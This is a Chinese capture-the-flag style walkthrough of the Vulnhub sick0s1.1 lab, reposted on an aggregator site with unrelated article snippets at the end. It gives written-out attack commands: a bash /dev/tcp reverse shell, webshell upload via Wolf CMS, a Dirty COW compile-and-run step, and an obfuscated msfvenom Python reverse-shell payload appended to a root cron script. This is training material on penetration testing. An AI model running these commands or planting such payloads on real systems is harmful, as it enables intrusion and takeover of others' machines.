Vulnhub sick0s1.1

news/2024/11/29 17:37:55/文章来源:https://www.cnblogs.com/kelec0ka/p/18577221

0x01:端口扫描

主机发现

nmap -sn 192.168.231.0/24

image-20241128195148641

全端口扫描

nmap --min-rate 10000 -p- 192.168.231.141

image-20241128195323441

22ssh,3128squid-http,但8080http是关闭的

Squid 是一个高性能的开源代理服务器软件,它支持多种协议,包括 HTTP、HTTPS、FTP 等。它通常用于以下几种用途:

1、Web代理:作为 HTTP 或 HTTPS 代理服务器,Squid 可以帮助在客户端和目标服务器之间中转网络流量,提供匿名访问、访问控制和缓存加速等功能。

2、缓存加速:Squid 可以缓存访问过的网页和内容,减少网络带宽的消耗,提高访问速度。它可以存储网页、图像、视频等文件的副本,在用户请求时直接返回缓存中的内容,从而加速访问。

3、访问控制:Squid 允许管理员根据 IP 地址、URL、时间等进行精细化的访问控制。可以限制某些网站的访问,或者设置过滤规则。

4、日志记录和监控:Squid 提供了详细的访问日志,管理员可以通过这些日志监控网络流量、查看哪些网站被访问、访问的频率等信息。

UDP扫描

nmap -sU --min-rate 10000 -p- 192.168.231.141

image-20241128195749346

无UDP端口开放

详细端口扫描

nmap -sT -sC -sV -O --min-rate 10000 -p22,3128,8080 192.168.231.141

image-20241128201645836

漏洞扫描

nmap --script=vuln -p22,3128,8080 192.168.231.141

image-20241128201626653

0x02:web渗透

因为它起了一个squid-http服务,所以我们需要开个代理

image-20241129143600440

image-20241128204606704

先扫目录

dirsearch -u http://192.168.231.141 --proxy http://192.168.231.141:3128

扫描到两个关键目录

image-20241128211018280

先看robot.txt目录里的内容

image-20241128211100093

得到一个目录/wolfcms的cms目录

再看看/connect目录,下载下来一个connect.py的文件

image-20241128211458721

我们查看一下

image-20241128211559680

我们再查看/wolfcms

image-20241128211701146

我们扫描目录

image-20241128212040246

/wolfcms/docs/updating.txt的目录文件里找到这个cms的版本:0.8.2

image-20241128212142904

查找漏洞

image-20241128215535330

看到38000.txt

image-20241128220358998

发现URL地址,我们首先需要登录

image-20241128215706079

弱口令admin : admin

登录进去后按照URL上传测试文件

image-20241128221140671

上传成功后就去上面指定的URL

image-20241128221148299

测试成功,现在上传木马

image-20241128222337744

antsword配代理后连接

image-20241128222403194

反弹shell

/bin/bash -c 'bash -i >& /dev/tcp/192.168.231.138/4444 0>&1'

image-20241128222754861

0x03:权限提升

先提tty

python -c 'import pty; pty.spawn("/bin/bash");'

看看自动表

cat /etc/crontab

image-20241129143756634

没有,我们再查看S位

find / -type f -perm -04000 -ls 2>/dev/null

image-20241129143851092

sudoedit,查看是否存在漏洞

sudoedit -s /

image-20241128223649988

并不是以sudoedit开头,不存在漏洞

查看可写文件

find / -type f -writable ! -path '/proc/*' 2>/dev/null

没有什么可疑文件

上传linpeas查看

image-20241129145233200

两个highly probable,都是脏牛,而且这台靶机有gcc,我们直接启动

wget 192.168.231.138:6666/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod 777 dirty
./dirty 123

但是靶机直接死机了,换一种方法试试

看看上级目录有什么文件

image-20241129154250614

我们查看一下配置文件

cat config.php

image-20241129153820346

找到一个凭证,是数据库的,但是没有关系,我们可以试试横向移动

看一下有哪些用户

cat /etc/passwd

image-20241129154544568

ssh只开放了这一个用户,我们尝试一下

ssh sickos@192.168.231.141

成功登录!查看权限

image-20241129154709002

直接提权!

image-20241129154725029

0x04:反思总结

1.利用公开cms漏洞可以直接拿到立足点

2.其实我现在查找cron任务的操作一直不正确

单纯的搜索cat /etc/crontab是不一定找得全的,我们得看全一点,我们可以使用以下命令检查所有 cron 目录中的自定义作业

ls -l /etc/cron*

image-20241129160451087

在这里我们发现了automate可疑表,我们查看

image-20241129160718781

image-20241129160822569

会执行这个文件,我们稍作修改

  • 让脚本将我们的 SSH 密钥添加到 root 的授权密钥列表中
  • 让脚本在我们的机器上生成一个反向 shell
  • 让脚本将 root 的密码更改为我们选择的密码
  • 让脚本将 /root 目录的权限更改为 777
  • 等等。。。

我们这里因为是反弹shell进来的,没有密码,我们最好使用python再反弹shell

我们用msfvenom生成一个

msfvenom -p cmd/unix/reverse_python LHOST=192.168.231.138 LPORT=5555 -f raw

image-20241129165026717

把它添加进connect.py

echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkNELgjAQxv8V8WmDOJtSGLEHCYOICtJ3ybVQMjc8/f+bbBF78+A4vrvfvg/WfrQaxgCVeMsx+NXKNE61HpSQiN5aGbk3s1E48pDtYmDbFOKEAUvS0N5mS74xZSVyaw92EKeyY3W65qUfak/F7XCuivKeZxfqPECovpdiJGRO9h7NcdRxCuE56ZggvNpO9opQD10vw9gyLHaY5v/PAvHoOhJGddtH2IT0C3nfWxM=')[0])))" >> /var/www/connect.py

等它1分钟后成功提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/843536.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Gemini

Gemini: 大规模DNN芯片阵列加速器的布局和架构 摘要 chiplet概要目标Chiplet(芯片阵列)技术允许在单一加速器上集成不断增加的晶体管的数量,在前摩尔定律时代获得了更高的效果,体现了在快速AI迭代进步中需要的大量算力。 但是,这样也引进了更高昂的大包开销,以及大量的d2…

hhdb数据库介绍(10-19)

监控 智能物理拓扑 物理拓扑图主要以服务器为视角展示集群组件与服务器的所属关系,同时可查看服务器资源的使用情况以及各集群组件服务运行状态。使用前需保证为集群服务器配置了可用的SSH连接信息,否则只能查看当前服务器与集群组件的所属关系,无法查看服务器与组件程序的状…

IDEA 2024.3 安装激活教程(至2099年)

IntelliJ IDEA简介 IntelliJ IDEA是一款非常强大的Java集成开发环境(IDE),由JetBrains公司开发。它提供了丰富的功能和工具,帮助开发者更高效地编写、调试和部署代码。 要求 在开始之前,请确保您的计算机满足以下系统要求:操作系统:Windows、macOS或Linux 处理器:至少1 GH…

证书安装后为什么还显示证书无效

在数字化时代,网络安全和数据保护变得尤为重要。SSL/TLS证书作为保护网站和用户数据安全的重要工具,其正确安装和有效性是网站运营者必须关注的问题。然而,有时候即使证书已经安装,用户仍然会遇到“证书无效”的提示,这可能由多种原因引起。本文将探讨在证书安装后,为何用…

windows下netstat及网络查看工具的使用

1.打开cmd: win+R 输入cmd 2.查看工具相关指令可以看到相关指令能配置查看的内容 3.查看相应内容 例如我想查看当前主机UDP协议所使用的端口: netstat -ano -p UDP同理查看TCP所使用的端口: netstat -ano -p TCP二、windows 自带的网络监视工具的使用 1.打开资源管理器 快捷键…

CTP行情和交易接口的初始化流程

目录行情接口初始化交易接口初始化行情接口初始化mdapi->Init(); 初始化行情接口的工作线程初始化之后,线程自动启动,并使用注册的地址向服务端请求建立连接。综合交易平台接口都有独立的工作线程如果开发者在进行可视化程序的开发,请务必注意线程冲突的问题。api启动,I…

数字电子技术的课设,交通灯倒计时

想知道这个要怎么实现30,5,20的倒计时,这个只能实现,20,5,10的,请问要怎么修改,谢谢

C++下的gRPC与protobuf使用和介绍

目录gRPC允许定义四类服务方法流是会结束的stream(流式传输)编写流程客户端使用 ClientReader客户端使用 ClientWriter客户端使用 ClientReaderWriter服务器端gRPC允许定义四类服务方法一元RPC:客户端发送一次请求,等待服务端响应结构,会话结束,就像一次普通的函数调用这…

uniapp 微信小程序 子组件行内样式通过父组件参数获取

uniapp中正常按vue写法没问题,但是编译成微信小程序时,style中会变成[object object],如下图 子组件可以通过计算属性处理一下传进来的style对象,代码如下<template><div><div>我是自定义组件</div><div :style="generateStyle">00{{t…

HuggingFace入门与实践

现在全民AI大模型,虽然我不是算法工程师,但是作为IT从业者,多少应该了解一下。然而,论文太多,原理太难,那咱们就从实践开始,先实践看效果,再学习研究原理。 1. 存在价值及原因简而言之:HuggingFace是菜鸟的福音,大佬的舞台,学术与工程的桥梁!平台链接:https://hug…

Filter内存马

概述 最近感冒了,不想BB太多,直接开始调试吧,先写个Filter来调试 Filter代码 新建一个FilterShell类,代码如下: 一个类如果想要成为Filter则需要继承Filter,然后重写init、doFilter、destory这三个方法,分别表示了init::Filter在初始化时被调用 doFilter:在Filter被命…

探索 TypeScript 编程的利器:ts-morph 入门与实践

我们是袋鼠云数栈 UED 团队,致力于打造优秀的一站式数据中台产品。我们始终保持工匠精神,探索前端道路,为社区积累并传播经验价值。本文作者:贝儿背景 在开发 web IDE 中生成代码大纲的功能时, 发现自己对 TypeScript 的了解知之甚少,以至于针对该功能的实现没有明确的思…